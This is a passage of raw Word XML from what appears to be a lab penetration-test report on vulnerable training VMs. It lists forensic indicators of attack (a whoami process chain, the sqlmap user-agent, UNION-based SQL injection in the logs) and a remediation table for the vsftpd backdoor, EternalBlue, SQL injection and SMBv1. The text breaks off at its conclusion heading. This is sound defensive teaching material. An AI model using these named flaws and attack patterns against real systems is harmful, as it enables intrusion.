      <w:r>
        <w:t>LOLBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> activity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05355431" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Security log shows unusual process execution chain: services.exe &gt; cmd.exe &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69EB8BD4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>8.3 Web Server Artefacts (VM-2: OWASP BWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C602E6B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Apache access.log: Repeated requests containing SQL metacharacters (quotes, UNION, SELECT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E16FA6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user-agent string visible in access logs: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/1.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438516A9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>MySQL general query log: UNION-based SELECT queries from application layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C325B0" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00752DF6" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5089B80A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRPr="00752DF6" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00752DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E662F13" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9242"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C934DB" w14:paraId="32416226" w14:textId="77777777" w:rsidTr="00D617DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8579" w:type="dxa"/>
          </w:tcPr>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82"/>
              <w:gridCol w:w="1685"/>
              <w:gridCol w:w="5647"/>
              <w:gridCol w:w="946"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C934DB" w14:paraId="4AC24105" w14:textId="77777777" w:rsidTr="00D617DD">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4128C4C4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Priority</w:t>
                  </w:r>
                </w:p>
              </w:tc>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54117D60" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Finding</w:t>
                  </w:r>
                </w:p>
              </w:tc>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3E03B47A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Recommendation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CC0000"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="CC0000"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="2F2F75AD" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Effort</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="7DF05044"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945281F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>P1 - Critical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D20F5CC" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 2.3.4 Backdoor</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4823FFE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Immediately replace with current </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>vsftpd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 3.x or alternative FTP daemon. Disable FTP if not required.</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3DDC58B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Low</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="3004D07B"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07443AB1" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>P1 - Critical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F8C40AF" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve">MS17-010 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>EternalBlue</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>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29A761B" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Apply KB4012212 immediately. Disable SMBv1 via PowerShell: Set-</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SmbServerConfiguration</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -EnableSMB1Protocol $false</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AB1BF4E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Low</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="40B07A80"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3BEBA8D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>P1 - Critical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7079216" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SQL Injection (DVWA)</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87C07D2" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Implement parameterised queries / prepared statements. Deploy WAF (</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>ModSecurity</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>). Input sanitisation on all user-supplied data.</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944D51C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Medium</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="13B01FF2"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D58467C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>P2 - High</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E94CF8C" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No Patch Management</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3DEB1928" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Implement automated patching via WSUS (Windows) and unattended-upgrades (Linux). Monthly patch cycle minimum.</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F30F190" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Medium</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="589E1DE9"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66C6397D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>P2 - High</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D98618D" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No Network Monitoring</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39E342B4" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Deploy IDS/IPS (Snort or Suricata). Implement SIEM (Splunk/ELK) for centralised log aggregation and alerting.</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E82BD1E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>High</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="7292A1CC"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4EE50B5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>P2 - High</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59AFA29" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No EDR on Endpoints</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257BB889" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Deploy endpoint detection (Microsoft Defender for Endpoint or CrowdStrike). Enable process creation logging.</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66317BE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Medium</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="594DDCC2"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7E55FDC6" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>P3 - Medium</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3F5A012" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>No DLP Controls</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410AB838" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Implement Data Loss Prevention tooling. Monitor and restrict database access. Encrypt sensitive data at rest.</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34A027A" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>High</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00C934DB" w14:paraId="082EFA38" w14:textId="77777777" w:rsidTr="00D617DD">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1B1AE189" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>P3 - Medium</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14AFD30" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>SMBv1 Enabled</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                  <w:tcBorders>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
                  </w:tcBorders>
                  <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
                  <w:tcMar>
                    <w:top w:w="80" w:type="dxa"/>
                    <w:left w:w="120" w:type="dxa"/>
                    <w:bottom w:w="80" w:type="dxa"/>
                    <w:right w:w="120" w:type="dxa"/>
                  </w:tcMar>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w14:paraId="64E01205" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Disable legacy protocols. Enforce SMBv3 with signing. Segment network to limit lateral movement paths.</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3204620" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD">
                  <w:r>
                    <w:rPr>
                      <w:color w:val="000000"/>
                      <w:sz w:val="20"/>
                      <w:szCs w:val="20"/>
                    </w:rPr>
                    <w:t>Low</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0D41D97E" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00D617DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="115F1CE9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="08E4BFB5" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="4A9B4AE9" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="4295A369" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="01AADA06" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127ADAB8" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="008854BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B056087" wp14:editId="3854D02B">
            <wp:extent cx="5731510" cy="3303905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1456980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980917" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3303905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2583B7" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="503AB6CE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="7783E6EE" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="008854BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C2D325" wp14:editId="552AFDE5">
            <wp:extent cx="5731510" cy="3510915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1924670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670361" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3510915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F4075" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="0798960F" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB"/>
    <w:p w14:paraId="03C170DB" w14:textId="77777777" w:rsidR="00C934DB" w:rsidRDefault="00C934DB" w:rsidP="00C934DB">
      <w:r w:rsidRPr="00D36BA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5B10A8" wp14:editId="599AEE66">
            <wp:extent cx="5731510" cy="3265805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1688475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475798" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3265805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527087B" w14:textId="77777777" w:rsidR="005A17FB" w:rsidRDefault="005A17FB" w:rsidP="00581970">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28689608" w14:textId="77777777" w:rsidR="00581970" w:rsidRDefault="00581970" w:rsidP="00581970">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09511929" w14:textId="77777777" w:rsidR="00E82E8E" w:rsidRDefault="00E82E8E" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138FADE9" w14:textId="77777777" w:rsidR="00E82E8E" w:rsidRDefault="00E82E8E" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A6CBEA" w14:textId="77777777" w:rsidR="00E82E8E" w:rsidRDefault="00E82E8E" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BBE2D3" w14:textId="77777777" w:rsidR="00E82E8E" w:rsidRDefault="00E82E8E" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AAD734" w14:textId="77777777" w:rsidR="00E82E8E" w:rsidRDefault="00E82E8E" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E7F846" w14:textId="1E43FCE0" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CONCLUSION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C05CC9C" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B8F7AB" w14:textId="77777777" w:rsidR="009D52D3" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D781B58" w14:textId="45874042" w:rsidR="00E82E8E" w:rsidRDefault="009D52D3" w:rsidP="00DB02B5">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D52D3">
        <w:rPr>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
